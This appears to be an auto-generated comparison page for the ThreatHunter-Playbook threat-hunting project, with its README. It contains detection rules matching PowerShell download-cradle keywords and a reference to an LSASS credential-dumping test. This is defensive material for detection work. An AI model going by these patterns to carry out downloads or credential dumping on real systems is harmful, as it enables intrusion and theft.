ThreatHunter-Playbook
A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.
Top Related Projects
Cyber Threat Intelligence Repository expressed in STIX 2.0
Small and highly portable detection tests based on MITRE's ATT&CK.
Open Source Security Events Metadata (OSSEM)
Main Sigma Rule Repository
Quick Overview
The OTRF/ThreatHunter-Playbook is a comprehensive resource for cybersecurity professionals, focusing on threat hunting techniques and methodologies. It provides a collection of hunting queries, data analysis procedures, and detection strategies to help security teams proactively identify and mitigate potential threats in their environments.
Pros
- Extensive collection of threat hunting techniques and queries
- Well-organized and categorized content for easy navigation
- Regular updates and contributions from the cybersecurity community
- Includes both general and platform-specific hunting strategies
Cons
- May require advanced knowledge of security concepts and tools
- Some queries might need adaptation for specific environments
- Limited coverage of certain niche or emerging threat vectors
- Requires ongoing maintenance to keep up with evolving threats
Getting Started
To get started with the ThreatHunter-Playbook:
- Visit the GitHub repository: https://github.com/OTRF/ThreatHunter-Playbook
- Browse the
docsfolder for detailed documentation and guides - Explore the
notebooksdirectory for Jupyter notebooks with practical examples - Review the
resourcessection for additional tools and references - Join the community discussions in the Issues and Pull Requests sections to contribute or ask questions
Note: This project is not a code library, but rather a collection of resources and documentation for threat hunting. Therefore, code examples and a quick start guide are not applicable in this context.
Competitor Comparisons
Cyber Threat Intelligence Repository expressed in STIX 2.0
Pros of cti
- Comprehensive MITRE ATT&CK framework data in STIX format
- Regular updates with the latest threat intelligence
- Widely adopted and integrated into many security tools
Cons of cti
- Focuses primarily on data, lacking specific detection and response guidance
- May require additional processing to extract actionable insights
- Less emphasis on practical implementation for threat hunting
Code Comparison
ThreatHunter-Playbook (YAML):
name: Suspicious PowerShell Download Cradle
description: Detects suspicious PowerShell download cradles
detection:
selection:
EventID: 4104
ScriptBlockText|contains:
- 'Net.WebClient'
- 'DownloadString'
cti (STIX JSON):
{
"type": "attack-pattern",
"id": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
"name": "PowerShell",
"description": "Adversaries may use PowerShell to execute various commands...",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
]
}
While ThreatHunter-Playbook provides specific detection rules, cti offers structured threat intelligence data that can be used to develop comprehensive detection strategies.
Small and highly portable detection tests based on MITRE's ATT&CK.
Pros of Atomic Red Team
- Extensive library of pre-built tests for various attack techniques
- Easy-to-use format with tests organized by MITRE ATT&CK tactics
- Active community and frequent updates
Cons of Atomic Red Team
- Focuses primarily on attack simulation, less on detection and response
- May require additional tools or setup for some tests
Code Comparison
ThreatHunter-Playbook (Jupyter Notebook example):
from openhunt.mordorutils import *
spark = get_spark()
df = spark.read.parquet(path)
df.printSchema()
df.show(10,False)
Atomic Red Team (YAML test definition):
attack_technique: T1003.001
display_name: 'OS Credential Dumping: LSASS Memory'
atomic_tests:
- name: Dump LSASS.exe Memory using ProcDump
auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
ThreatHunter-Playbook provides more comprehensive analytics and detection strategies, while Atomic Red Team excels in providing a wide range of attack simulations. ThreatHunter-Playbook uses Jupyter Notebooks for analysis, whereas Atomic Red Team uses YAML for test definitions. Both repositories complement each other, with ThreatHunter-Playbook focusing on threat hunting and Atomic Red Team on attack simulation.
Open Source Security Events Metadata (OSSEM)
Pros of OSSEM
- Provides a comprehensive data model for security events
- Focuses on standardizing data structures and relationships
- Offers broader applicability across various security tools and platforms
Cons of OSSEM
- More complex and requires deeper understanding of data modeling
- Less immediate practical application for threat hunting
- May require more effort to implement in existing security workflows
Code Comparison
OSSEM (Data Dictionary):
- Standard_Name: UserName
Standard_Type: String
Description: The name of the user account
Sample_Value: john.doe
ThreatHunter-Playbook (Analytic):
title: Suspicious PowerShell Download
description: Detects PowerShell downloading files from the internet
author: John Doe
detection:
selection:
EventID: 4104
ScriptBlockText: '*Invoke-WebRequest*'
The OSSEM example shows a data dictionary entry, focusing on standardizing data fields. The ThreatHunter-Playbook example demonstrates a practical detection rule, ready for implementation in threat hunting scenarios.
Main Sigma Rule Repository
Pros of Sigma
- Generic, vendor-agnostic rule format for easier sharing and portability
- Extensive collection of pre-written detection rules
- Supports conversion to various SIEM and data analysis tools
Cons of Sigma
- Primarily focused on detection rules, less comprehensive for full threat hunting workflows
- May require additional tools or scripts for implementation in some environments
Code Comparison
Sigma rule example:
title: Suspicious PowerShell Download
detection:
selection:
EventID: 4104
ScriptBlockText|contains:
- 'Net.WebClient'
- '.DownloadFile'
condition: selection
ThreatHunter-Playbook notebook example:
# Query for PowerShell download events
results = spark.sql("""
SELECT ScriptBlockText
FROM powershell_events
WHERE ScriptBlockText LIKE '%Net.WebClient%'
AND ScriptBlockText LIKE '%.DownloadFile%'
""")
Both repositories provide valuable resources for threat detection and hunting. Sigma offers a standardized approach to writing and sharing detection rules, while ThreatHunter-Playbook provides more comprehensive playbooks and workflows for threat hunting scenarios. The choice between them depends on specific use cases and integration requirements.
Convert 
designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
The Threat Hunter Playbook
The Threat Hunter Playbook is a community-driven, open source project to share detection logic, adversary tradecraft and resources to make detection development more efficient. All the detection documents in this project follow the structure of MITRE ATT&CK categorizing post-compromise adversary behavior in tactical groups and are available in the form of interactive notebooks. The use of notebooks not only allow us to share text, queries and expected output, but also code to help others run detection logic against pre-recorded security datasets locally or remotely through BinderHub cloud computing environments.
Docs: https://threathunterplaybook.com/
Goals
- Expedite the development of techniques an hypothesis for hunting campaigns.
- Help security researchers understand patterns of behavior observed during post-exploitation.
- Share resources to validate analytics locally or remotely through cloud computing environments for free.
- Map pre-recorded datasets to adversarial techniques.
- Accelerate infosec learning through open source resources.
Author
Roberto Rodriguez @Cyb3rWard0g
Official Committers
- Jose Luis Rodriguez @Cyb3rPandaH is adding his expertise in data science to it.
Acknowledgements
- We document and share our content via a Jupyter Book which was created by Sam Lau and Chris Holdgraf with support of the UC Berkeley Data Science Education Program and the Berkeley Institute for Data Science
Top Related Projects
Cyber Threat Intelligence Repository expressed in STIX 2.0
Small and highly portable detection tests based on MITRE's ATT&CK.
Open Source Security Events Metadata (OSSEM)
Main Sigma Rule Repository
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot